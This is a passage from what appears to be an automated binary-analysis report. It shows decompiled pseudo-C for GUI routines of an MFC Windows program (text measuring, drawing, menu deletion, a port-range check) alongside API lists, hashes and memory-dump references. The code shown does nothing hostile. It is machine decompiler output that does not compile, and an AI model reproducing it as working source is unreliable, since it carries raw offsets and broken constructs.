					if(_t91 == 0) {
						_t121 = GetDesktopWindow();
						_push(_t121);
						L00426372();
						 *(_t174 - 0x1c) = _t121;
					}
					_t93 = GetDC( *( *(_t174 - 0x1c) + 0x20));
					_push(_t93);
					L00425FD0();
					 *(_t174 - 0x28) =  *(_t174 - 0x28) & 0x00000000;
					_t163 = _t93;
					if( *0x4421ac >= 2) {
						 *(_t174 - 0x28) =  *((intOrPtr*)(_t163->i + 0x30))(_t174 - 0x24);
					}
					_t128 =  *( *(_t127 + 0x14));
					 *((intOrPtr*)(_t174 - 0x14)) = 0;
					 *(_t174 - 0x18) = 0;
					if( *0x4421ac == 0) {
						 *((intOrPtr*)(_t174 - 0x34)) = 0;
						 *(_t174 - 0x38) = 0;
						 *((intOrPtr*)(_t174 - 0x14)) = DrawTextA( *(_t163 + 4), _t128, wcslen(_t128), _t174 - 0x38, 0x424);
						 *(_t174 - 0x18) =  *((intOrPtr*)(_t174 - 0x30)) -  *(_t174 - 0x38) + 3;
						_t102 = wcslen(_t128);
						 *(_t174 - 0x18) =  *(_t174 - 0x18) +  *(_t174 - 0x18) / _t102 +  *(_t174 - 0x18) / _t102 * 2;
					} else {
						GetTextExtentPoint32W( *(_t163 + 4), _t128, wcslen(_t128), _t174 - 0x18);
					}
					_t170 =  *(_t174 - 0x18);
					 *((intOrPtr*)(_t174 - 0x2c)) =  *((intOrPtr*)(_t174 - 0x14));
					if( *0x4421ac >= 2) {
						 *((intOrPtr*)(_t163->i + 0x30))( *(_t174 - 0x28));
					}
					_t109 = L0040214E(ReleaseDC( *( *(_t174 - 0x1c) + 0x20),  *(_t163 + 4)));
					_t110 =  *0x440d08; // 0x10
					if(_t109 == 0) {
						_t111 = _t170 + 1 + _t110 * 2;
					} else {
						_t111 = _t110 + _t170 +  *((intOrPtr*)(_t174 - 0x10)) + 8;
					}
					 *((intOrPtr*)( *((intOrPtr*)(_t174 + 8)) + 0xc)) = _t111;
					_t112 = GetSystemMetrics(0xf);
					_t141 =  *0x440d0c; // 0xf
					_t142 = _t141 +  *((intOrPtr*)(_t174 - 0x10));
					if(_t112 <= _t142) {
						_t112 = _t142;
					}
					 *( *((intOrPtr*)(_t174 + 8)) + 0x10) = _t112;
					L00425FA6();
					 *((intOrPtr*)(_t174 - 0x24)) = 0x42c514;
					 *(_t174 - 4) = 1;
					L00425FA6();
				} else {
					 *(_t127 + 0xc) =  *(_t127 + 0xc) & 0x00000000;
					_t173 = GetSystemMetrics(0xf) >> 1;
					_t112 = L0040214E(_t122);
					if(_t112 == 0) {
						_t123 =  *0x440d0c; // 0xf
						asm("cdq");
						_t112 = _t123 +  *((intOrPtr*)(_t174 - 0x10)) - _t153 >> 1;
						if(_t173 > _t112) {
							_t112 = _t173;
						}
						 *(_t127 + 0x10) = _t112;
					} else {
						 *(_t127 + 0x10) = 3;
					}
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t174 - 0xc));
				return _t112;
			}

0x00401537
0x004143e5
0x004143f1
0x004143f5
0x004143ff
0x00414409
0x00414414
0x00414414
0x00414421
0x00414465
0x0041446a
0x00414475
0x00414479
0x0041447f
0x00414490
0x00414496
0x004144a4
0x004144b4
0x004144b8
0x004144bd
0x004144c4
0x004144c7
0x004144c9
0x004144cf
0x004144d0
0x004144d5
0x004144d5
0x004144de
0x004144e4
0x004144e5
0x004144ea
0x004144f5
0x004144f7
0x00414504
0x00414504
0x0041450a
0x00414514
0x00414517
0x0041451a
0x0041453b
0x0041453e
0x00414559
0x00414566
0x00414569
0x0041457c
0x0041451c
0x0041452d
0x0041452d
0x00414589
0x0041458c
0x0041458f
0x00414598
0x00414598
0x004145aa
0x004145b1
0x004145b7
0x004145c4
0x004145b9
0x004145be
0x004145be
0x004145cd
0x004145d0
0x004145d6
0x004145df
0x004145e3
0x004145e5
0x004145e5
0x004145ea
0x004145f0
0x004145f5
0x004145ff
0x00414606
0x00414423
0x00414423
0x00414431
0x00414433
0x0041443a
0x00414448
0x00414452
0x00414455
0x00414459
0x0041445b
0x0041445b
0x0041445d
0x0041443c
0x0041443c
0x0041443c
0x0041443a
0x00414610
0x00414618

APIs

_EH_prolog.MSVCRT ref: 004143E5
GetSystemMetrics.USER32 ref: 00414429
SystemParametersInfoA.USER32(00000029,00000154,?,00000000), ref: 00414496
CreateFontIndirectA.GDI32(?), ref: 004144AE
#1641.MFC42(00000000), ref: 004144B8
GetDesktopWindow.USER32 ref: 004144C9
#2864.MFC42(00000000), ref: 004144D0
GetDC.USER32(00000000), ref: 004144DE
#2859.MFC42(00000000), ref: 004144E5
wcslen.MSVCRT ref: 00414521
GetTextExtentPoint32W.GDI32(?,?,00000000), ref: 0041452D
wcslen.MSVCRT ref: 0041454B
DrawTextA.USER32(?,?,00000000), ref: 00414553
wcslen.MSVCRT ref: 00414569
ReleaseDC.USER32 ref: 004145A4
GetSystemMetrics.USER32 ref: 004145D0
#2414.MFC42 ref: 004145F0
#2414.MFC42 ref: 00414606

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: Systemwcslen$#2414MetricsText$#1641#2859#2864CreateDesktopDrawExtentFontH_prologIndirectInfoParametersPoint32ReleaseWindow
String ID:
API String ID: 3078924865-0
Opcode ID: 6febc4d263af19415d94340daa2e098c17e54691c249b63a8395e86f4d2d32f0
Instruction ID: b36e5ad9765593f0afb3f9444e4d01b5a5d8d127de33ffd1d292755c494f769a
Opcode Fuzzy Hash: 6febc4d263af19415d94340daa2e098c17e54691c249b63a8395e86f4d2d32f0
Instruction Fuzzy Hash: E4715CB5A00219DFDB04DFA4D989BEEBBB5FF48304F10406AE905E7291D778A944CF58

Uniqueness

Uniqueness Score: -1.00%

Function 00401B68, Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 205windowCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 0041C1D0
GetDeviceCaps.GDI32(?,00000026), ref: 0041C1EB
GetDeviceCaps.GDI32(?,0000000C), ref: 0041C1FC
GetDeviceCaps.GDI32(?,0000000E), ref: 0041C206
#2754.MFC42(00000000,?), ref: 0041C237
_ftol.MSVCRT ref: 0041C274
#5791.MFC42(?,00000000), ref: 0041C2EE
RealizePalette.GDI32(?), ref: 0041C2FC
#283.MFC42(?), ref: 0041C33A
FillRect.USER32 ref: 0041C370
#2414.MFC42 ref: 0041C379
#2414.MFC42 ref: 0041C38C
#5791.MFC42(?,00000001), ref: 0041C3E7

Strings

XB, xrefs: 0041C2AF, 0041C2B2

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: CapsDevice$#2414#5791$#2754#283FillH_prologPaletteRealizeRect_ftol
String ID: XB
API String ID: 1474428489-1206283037
Opcode ID: bbca7b635a167b6c7e6f61c62544ace08cc1622aac76ce56bc9ae7ee0b7af149
Instruction ID: 60f3e10b5da2b7ea72f7943444cb638ad523e6e26bb65832def1895bd937ef47
Opcode Fuzzy Hash: bbca7b635a167b6c7e6f61c62544ace08cc1622aac76ce56bc9ae7ee0b7af149
Instruction Fuzzy Hash: AA815971A00129DFCF04DF98CC859EEBBB5FF49704F11811AF815AB251C778AA95CB98

Uniqueness

Uniqueness Score: -1.00%

Function 00417F9C, Relevance: 25.7, APIs: 17, Instructions: 185
windowCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E00417F9C(void* __ecx) {
				signed char _t78;
				struct HMENU__* _t79;
				int _t83;
				signed int _t84;
				signed int _t90;
				int _t92;
				void* _t96;
				void* _t100;
				struct HMENU__* _t103;
				struct HMENU__* _t105;
				intOrPtr _t106;
				intOrPtr _t109;
				signed int _t110;
				intOrPtr* _t114;
				intOrPtr _t123;
				signed int _t135;
				signed int _t136;
				int _t138;
				signed int _t139;
				int _t140;
				signed int _t142;
				signed int _t144;
				intOrPtr _t145;
				void* _t147;
				void* _t149;

				L004269E6();
				_t147 = __ecx;
				if(( *(_t149 + 0xc) & 0x00000400) != 0) {
					_t138 =  *(_t149 + 8);
					L4:
					_t78 = GetMenuState( *(_t147 + 4), _t138, 0x400);
					if((_t78 & 0x00000008) == 0 || (_t78 & 0x00000010) != 0) {
						_t79 = GetSubMenu( *(_t147 + 4), _t138);
						_push(_t79);
						L0042635A();
						_t103 = _t79;
						 *(_t149 - 0x18) = _t103;
						if(_t103 != 0) {
							_t139 =  *(_t147 + 0x24);
							while(1) {
								_t139 = _t139 - 1;
								if(_t139 < 0) {
									break;
								}
								if( *((intOrPtr*)( *((intOrPtr*)(_t147 + 0x20)) + _t139 * 4)) !=  *(_t103 + 4)) {
									continue;
								}
								_t90 =  *0x4421a0 - 1;
								 *(_t149 - 0x10) = _t90;
								if(_t90 < 0) {
									L28:
									_push(1);
									_push(_t139);
									L0042660C();
									continue;
								} else {
									goto L25;
								}
								do {
									L25:
									_t135 =  *(_t149 - 0x10);
									if( *((intOrPtr*)( *0x44219c + _t135 * 4)) ==  *((intOrPtr*)( *((intOrPtr*)(_t147 + 0x20)) + _t139 * 4))) {
										_push(1);
										_push(_t135);
										L0042660C();
									}
									_t58 = _t149 - 0x10;
									 *_t58 =  *(_t149 - 0x10) - 1;
								} while ( *_t58 >= 0);
								goto L28;
							}
							_t140 = GetMenuItemCount( *(_t103 + 4));
							while(1) {
								_t140 = _t140 - 1;
								if(_t140 < 0) {
									break;
								}
								_push(0x400);
								_push(_t140);
								L00401735(_t103);
							}
							_t142 =  *((intOrPtr*)(_t147 + 0x10)) - 1;
							if(_t142 < 0) {
								L41:
								 *((intOrPtr*)(_t103->i + 4))(1);
								goto L42;
							}
							_t84 =  *(_t147 + 0xc);
							_t105 =  *(_t103 + 4);
							_t114 = _t84 + _t142 * 4;
							while( *((intOrPtr*)( *_t114 + 0x14)) != _t105) {
								_t142 = _t142 - 1;
								_t114 = _t114 - 4;
								if(_t142 >= 0) {
									continue;
								}
								L40:
								_t103 =  *(_t149 - 0x18);
								goto L41;
							}
							_t106 =  *((intOrPtr*)(_t84 + _t142 * 4));
							if(_t106 != 0) {
								L0040158C(_t106);
								_push(_t106);
								L00425DF0();
							}
							_push(1);
							_push(_t142);
							L0042660C();
							goto L40;
						}
						_t92 = GetMenuItemID( *(_t147 + 4), _t138);
						_t123 =  *((intOrPtr*)(_t147 + 0x10));
						_t144 = 0;
						if(_t123 <= 0) {
							goto L42;
						}
						_t136 =  *(_t147 + 0xc);
						 *(_t149 - 0x10) = _t136;
						while( *((intOrPtr*)( *( *(_t149 - 0x10)) + 0x14)) != _t92) {
							 *(_t149 - 0x10) =  *(_t149 - 0x10) + 4;
							_t144 = _t144 + 1;
							if(_t144 < _t123) {
								continue;
							}
							goto L42;
						}
						_t109 =  *((intOrPtr*)(_t136 + _t144 * 4));
						if(_t109 != 0) {
							L0040158C(_t109);
							_push(_t109);
							L00425DF0();
						}
						_push(1);
						_push(_t144);
						L0042660C();
						goto L42;
					} else {
						if(_t138 <  *((intOrPtr*)(_t147 + 0x10))) {
							_t110 =  *(_t149 + 8);
							_t96 = L0040154B( *((intOrPtr*)( *(_t147 + 0xc) + _t110 * 4)));
							 *(_t149 - 4) =  *(_t149 - 4) & 0x00000000;
							__imp___mbscmp( *(_t149 - 0x10), 0x4421fc, _t149 - 0x10);
							if(_t96 == 0) {
								_t145 =  *((intOrPtr*)( *(_t147 + 0xc) + _t110 * 4));
								if(_t145 != 0) {
									L0040158C(_t145);
									_push(_t145);
									L00425DF0();
								}
								_push(1);
								_push(_t110);
								L0042660C();
							}
							 *(_t149 - 4) =  *(_t149 - 4) | 0xffffffff;
							L00425DFC();
						}
						L42:
						_t83 = DeleteMenu( *(_t147 + 4),  *(_t149 + 8),  *(_t149 + 0xc));
						 *[fs:0x0] =  *((intOrPtr*)(_t149 - 0xc));
						return _t83;
					}
				}
				 *(_t149 - 0x14) =  *(_t149 - 0x14) & 0x00000000;
				_t100 = L004013CA(__ecx,  *(_t149 + 8), _t149 - 0x14);
				if(_t100 == 0) {
					goto L42;
				}
				_t138 =  *(_t149 - 0x14);
				 *(_t149 + 0xc) = 0x400;
				 *(_t149 + 8) = _t138;
				_t147 = _t100;
				goto L4;
			}

0x00417fa1
0x00417fb4
0x00417fb6
0x00417fdd
0x00417fe0
0x00417fe5
0x00417fee
0x0041805f
0x00418065
0x00418066
0x0041806b
0x0041806f
0x00418072
0x004180ce
0x004180d1
0x004180d1
0x004180d2
0x00000000
0x00000000
0x004180dd
0x00000000
0x00000000
0x004180e4
0x004180e7
0x004180ea
0x00418112
0x00418112
0x00418114
0x00418118
0x00000000
0x00000000
0x00000000
0x00000000
0x004180ec
0x004180ec
0x004180f2
0x004180fe
0x00418100
0x00418102
0x00418108
0x00418108
0x0041810d
0x0041810d
0x0041810d
0x00000000
0x004180ec
0x00418128
0x0041812a
0x0041812a
0x0041812b
0x00000000
0x00000000
0x0041812d
0x00418132
0x00418135
0x00418135
0x0041813f
0x00418140
0x0041817f
0x00418185
0x00000000
0x00418185
0x00418142
0x00418145
0x00418148
0x0041814b
0x00418152
0x00418153
0x00418158
0x00000000
0x00000000
0x0041817c
0x0041817c
0x00000000
0x0041817c
0x0041815c
0x00418161
0x00418165
0x0041816a
0x0041816b
0x00418170
0x00418171
0x00418173
0x00418177
0x00000000
0x00418177
0x00418078
0x0041807e
0x00418081
0x00418085
0x00000000
0x00000000
0x0041808b
0x0041808e
0x00418091
0x0041809b
0x0041809f
0x004180a2
0x00000000
0x00000000
0x00000000
0x004180a4
0x004180a9
0x004180ae
0x004180b2
0x004180b7
0x004180b8
0x004180bd
0x004180be
0x004180c0
0x004180c4
0x00000000
0x00417ff4
0x00417ff7
0x00417ffd
0x0041800a
0x0041800f
0x0041801b
0x00418025
0x0041802a
0x0041802f
0x00418033
0x00418038
0x00418039
0x0041803e
0x0041803f
0x00418041
0x00418045
0x00418045
0x0041804a
0x00418051
0x00418051
0x00418188
0x00418191
0x0041819d
0x004181a5
0x004181a5
0x00417fee
0x00417fb8
0x00417fc3
0x00417fca
0x00000000
0x00000000
0x00417fd0
0x00417fd3
0x00417fd6
0x00417fd9
0x00000000

APIs

_EH_prolog.MSVCRT ref: 00417FA1
GetMenuState.USER32 ref: 00417FE5
_mbscmp.MSVCRT ref: 0041801B
#825.MFC42(?), ref: 00418039
#5606.MFC42(?,00000001), ref: 00418045
#800.MFC42 ref: 00418051
GetSubMenu.USER32 ref: 0041805F
#2863.MFC42(00000000), ref: 00418066
GetMenuItemID.USER32(?,?), ref: 00418078
#825.MFC42(?), ref: 004180B8
#5606.MFC42(00000000,00000001), ref: 004180C4
#5606.MFC42(?,00000001,00000000), ref: 00418108
#5606.MFC42(?,00000001,00000000), ref: 00418118
GetMenuItemCount.USER32 ref: 00418122
#825.MFC42(?), ref: 0041816B
#5606.MFC42(?,00000001), ref: 00418177
DeleteMenu.USER32(?,?,?), ref: 00418191

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #5606Menu$#825$Item$#2863#800CountDeleteH_prologState_mbscmp
String ID:
API String ID: 101581015-0
Opcode ID: d729b37ef9b6c9cdac86ee824116ab0f67a080c34f17b4fe2aec34f8813a9621
Instruction ID: 8862950c9d97515ef75293d618ebe687f1f4914f72870cfca853a50f2b292d2e
Opcode Fuzzy Hash: d729b37ef9b6c9cdac86ee824116ab0f67a080c34f17b4fe2aec34f8813a9621
Instruction Fuzzy Hash: 3F61B335600615EBCB20DF15D881AAFB7B2FF99314F51842EE9065B252CF78EC86CB18

Uniqueness

Uniqueness Score: -1.00%

Function 00422273, Relevance: 24.2, APIs: 16, Instructions: 177
windowCOMMON

Download Yara Rule

C-Code - Quality: 66%

			E00422273(intOrPtr __ecx, void* __eflags) {
				intOrPtr _t81;
				struct HBRUSH__* _t84;
				struct tagRECT _t100;
				struct HBRUSH__* _t103;
				struct HICON__* _t108;
				signed int _t109;
				void* _t110;
				intOrPtr _t114;
				signed int _t124;
				struct tagSIZE _t126;
				void* _t127;
				intOrPtr _t143;
				struct tagSIZE* _t148;
				signed int _t150;
				intOrPtr _t153;
				struct tagRECT _t154;
				intOrPtr _t155;
				void* _t157;

				L004269E6();
				_t153 =  *((intOrPtr*)(_t157 + 0x14));
				 *((intOrPtr*)(_t157 - 0x10)) = __ecx;
				_push(_t157 - 0x14);
				L004014F6(_t153);
				_t150 =  *(_t157 + 8);
				 *(_t157 - 4) =  *(_t157 - 4) & 0x00000000;
				_t148 = _t157 - 0x24;
				GetTextExtentPoint32A( *(_t150 + 8),  *(_t157 - 0x14),  *( *(_t157 - 0x14) - 8), _t148);
				_t126 =  *(_t157 - 0x24);
				 *(_t157 - 0x1c) = _t126;
				_t127 = _t126 + 4;
				if(_t127 > 0xc8) {
					_t127 = 0xc8;
				}
				 *(_t157 + 8) =  *(_t157 + 8) & 0x00000000;
				if( *((intOrPtr*)(_t153 + 0x20)) != 0) {
					_t124 = 0x12;
					 *(_t157 + 8) = _t124;
					_t127 = _t127 + _t124;
				}
				_t154 =  *(_t157 + 0xc);
				_t81 = _t127 + 6;
				 *((intOrPtr*)(_t157 - 0x18)) = _t81;
				 *((intOrPtr*)(_t157 - 0x2c)) = _t81 + _t154;
				_t84 =  *((intOrPtr*)(_t157 - 0x10)) + 0x40;
				 *(_t157 - 0x34) = _t154;
				 *(_t157 - 0x30) = 6;
				 *((intOrPtr*)(_t157 - 0x28)) = 0x1a;
				if(_t84 != 0) {
					_t84 =  *(_t84 + 4);
				}
				FrameRect( *(_t150 + 4), _t157 - 0x34, _t84);
				_push( *((intOrPtr*)(_t157 - 0x10)) + 0x50);
				L00426636();
				_push(7);
				_push(_t154 + 1);
				_push(_t157 - 0x2c);
				L004266F0();
				_push(0x19);
				_push(_t154 + 1);
				L004266EA();
				_push(7);
				_push(_t154 + 1);
				_push(_t157 - 0x2c);
				L004266F0();
				_push(7);
				_push(_t127 + _t154 + 4);
				L004266EA();
				_push( *((intOrPtr*)(_t157 - 0x10)) + 0x70);
				L00426636();
				_push(7);
				_push(_t127 + _t154 + 4);
				_push(_t157 - 0x2c);
				L004266F0();
				_push(0x19);
				_push(_t127 + _t154 + 4);
				L004266EA();
				_t100 = _t154 + 2;
				 *(_t157 - 0x30) = 8;
				 *(_t157 - 0x34) = _t100;
				 *((intOrPtr*)(_t157 - 0x28)) = 0x19;
				 *((intOrPtr*)(_t157 - 0x2c)) = _t127 + _t100 + 2;
				_t103 =  *((intOrPtr*)(_t157 - 0x10)) + 0x48;
				if(_t103 != 0) {
					_t103 =  *(_t103 + 4);
				}
				FillRect( *(_t150 + 4), _t157 - 0x34, _t103);
				_push(GetSysColor(0xf));
				_push(0);
				_push( *((intOrPtr*)(_t157 - 0x18)));
				_push(6);
				_push(_t154);
				L0042671A();
				_t108 =  *( *((intOrPtr*)(_t157 + 0x14)) + 0x20);
				if(_t108 != 0) {
					DrawIconEx( *(_t150 + 4), _t154 + 4, 8, _t108, 0x10, 0x10, 0, 0, 3);
				}
				_t109 =  *(_t157 + 8);
				_t143 =  *((intOrPtr*)(_t157 - 0x20));
				_t61 = _t154 + 3; // 0x3
				_t155 = _t109 + _t61;
				_t110 = 0x14;
				asm("cdq");
				 *((intOrPtr*)(_t157 - 0x44)) = _t155;
				_t114 = (_t110 - _t143 - _t148 >> 1) + 7;
				 *((intOrPtr*)(_t157 - 0x3c)) = _t127 - _t109 + _t155;
				 *((intOrPtr*)(_t157 - 0x40)) = _t114;
				 *((intOrPtr*)(_t157 - 0x38)) = _t114 + _t143;
				L00401BC7( *((intOrPtr*)(_t157 + 0x14)),  *((intOrPtr*)(_t157 - 0x10)) + 0x80);
				E004011B8( *((intOrPtr*)(_t157 + 0x14)), _t157 - 0x44);
				 *(_t157 - 4) =  *(_t157 - 4) | 0xffffffff;
				L00425DFC();
				 *[fs:0x0] =  *((intOrPtr*)(_t157 - 0xc));
				return  *((intOrPtr*)(_t157 - 0x18));
			}

0x00422278
0x00422282
0x00422285
0x0042228c
0x0042228f
0x00422297
0x0042229a
0x0042229e
0x004222aa
0x004222b0
0x004222b8
0x004222bb
0x004222c0
0x004222c2
0x004222c2
0x004222c4
0x004222cc
0x004222d0
0x004222d1
0x004222d4
0x004222d4
0x004222d6
0x004222d9
0x004222dc
0x004222e1
0x004222e7
0x004222ea
0x004222ef
0x004222f6
0x004222fd
0x004222ff
0x004222ff
0x0042230a
0x00422318
0x00422319
0x00422321
0x00422323
0x00422327
0x0042232a
0x00422332
0x00422334
0x00422337
0x0042233f
0x00422341
0x00422345
0x00422348
0x00422351
0x00422353
0x00422356
0x00422363
0x00422364
0x0042236d
0x0042236f
0x00422373
0x00422376
0x0042237f
0x00422381
0x00422384
0x00422389
0x0042238c
0x00422393
0x00422396
0x004223a1
0x004223a7
0x004223ac
0x004223ae
0x004223ae
0x004223b9
0x004223c7
0x004223c8
0x004223ca
0x004223cf
0x004223d1
0x004223d2
0x004223da
0x004223df
0x004223f5
0x004223f5
0x004223fb
0x004223fe
0x00422405
0x00422405
0x00422409
0x0042240e
0x00422411
0x00422416
0x00422419
0x0042241c
0x00422424
0x00422430
0x0042243c
0x00422441
0x00422448
0x00422456
0x0042245e

APIs

_EH_prolog.MSVCRT ref: 00422278
GetTextExtentPoint32A.GDI32(?,?,?,?), ref: 004222AA
FrameRect.USER32 ref: 0042230A
#5787.MFC42(?), ref: 00422319
#4297.MFC42(?,?,00000007,?), ref: 0042232A
#4133.MFC42(?,00000019,?,?,00000007,?), ref: 00422337
#4297.MFC42(?,?,00000007,?,00000019,?,?,00000007,?), ref: 00422348
#4133.MFC42(00000000,00000007,?,?,00000007,?,00000019,?,?,00000007,?), ref: 00422356
#5787.MFC42(?,00000000,00000007,?,?,00000007,?,00000019,?,?,00000007,?), ref: 00422364
#4297.MFC42(?,00000000,00000007,?,00000000,00000007,?,?,00000007,?,00000019,?,?,00000007,?), ref: 00422376
#4133.MFC42(00000000,00000019,?,00000000,00000007,?,00000000,00000007,?,?,00000007,?,00000019,?,?,00000007), ref: 00422384
FillRect.USER32 ref: 004223B9
GetSysColor.USER32(0000000F), ref: 004223C1
#2753.MFC42(?,00000006,?,00000000,00000000), ref: 004223D2
DrawIconEx.USER32 ref: 004223F5

Part of subcall function 004011B8: #4299.MFC42(?,?,?,?,00000001), ref: 00421529

#800.MFC42(?,?,00000006,?,00000000,00000000), ref: 00422448

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #4133#4297$#5787Rect$#2753#4299#800ColorDrawExtentFillFrameH_prologIconPoint32Text
String ID:
API String ID: 734410698-0
Opcode ID: eda649fb14754aa2be2ef817309c05a2a4859fe9a2355fe48872231775094fe8
Instruction ID: bd7d8a367fa3d5fc488c4ac0d84a6ed313556999964a1771a1357e80a994385d
Opcode Fuzzy Hash: eda649fb14754aa2be2ef817309c05a2a4859fe9a2355fe48872231775094fe8
Instruction Fuzzy Hash: 48615DB1A00219AFDB10DFA4DD85FEEB7B9BB48304F44402AF915E7281D778E9058B64

Uniqueness

Uniqueness Score: -1.00%

Function 00401B3B, Relevance: 24.1, APIs: 16, Instructions: 142
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E00401B3B(void* __ecx) {
				long _t49;
				void* _t50;
				intOrPtr _t54;
				void* _t82;
				void* _t89;
				intOrPtr _t90;
				void* _t92;
				void* _t94;
				void* _t96;
				intOrPtr _t97;

				L004269E6();
				_t97 = _t96 - 0x14;
				_t92 = __ecx;
				L00425E08();
				_t86 = __ecx + 0x4b4;
				_push(_t94 - 0x18);
				 *(_t94 - 4) = 0;
				_push(E004013A7(__ecx + 0x4b4));
				 *(_t94 - 4) = 1;
				L00426054();
				 *(_t94 - 4) = 0;
				L00425DFC();
				_t49 =  *(_t94 - 0x10);
				if( *((intOrPtr*)(_t49 - 8)) != 0) {
					_t50 = L00401CB7(_t86);
					 *(_t94 - 0x18) = _t50;
					if(_t50 < 0x5dc || _t50 > 0xfde8) {
						L00425E08();
						_push(0xfde8);
						_push(0x5dc);
						_t49 = _t94 - 0x18;
						_push(0x806b);
						_push(_t49);
						 *(_t94 - 4) = 2;
						L0042638A();
						_push(0);
						_push(0);
						_push( *(_t94 - 0x18));
						L00426030();
						 *(_t94 - 4) = 0;
					} else {
						_t89 = __ecx + 0x4b4;
						_push(_t94 - 0x14);
						L00401C71(_t89);
						 *(_t94 - 4) = 3;
						_t49 =  *( *((intOrPtr*)(_t94 - 0x14)) - 8);
						if(_t49 == 0 || _t49 < 5) {
							_push(0xffffffff);
							_push(0);
							_push(0x806a);
							L00425E56();
						} else {
							_push(0x2c);
							L00425E38();
							 *(_t94 - 0x1c) = _t49;
							 *(_t94 - 4) = 4;
							if(_t49 == 0) {
								_t54 = 0;
							} else {
								_t82 = _t89;
								_push(L00401BD6(_t82));
								_push(_t82);
								 *((intOrPtr*)(_t94 - 0x20)) = _t97;
								_push(_t94 - 0x14);
								L0042611A();
								_push(__ecx);
								_t54 = E00401A73( *(_t94 - 0x1c));
							}
							_push( *(_t94 - 0x18));
							 *(_t94 - 4) = 3;
							 *((intOrPtr*)(_t92 + 0x214)) = _t54;
							_push( *(_t94 - 0x10));
							while(1) {
								L00426390();
								if(_t54 != 0) {
									break;
								}
								_push(0xffffffff);
								_push(0x24);
								_push(0x804e);
								L00425E56();
								if(_t54 == 7) {
									_t49 = L00401A00(_t92);
								} else {
									_push( *(_t94 - 0x18));
									_push( *(_t94 - 0x10));
									continue;
								}
								goto L17;
							}
							_t90 = 1;
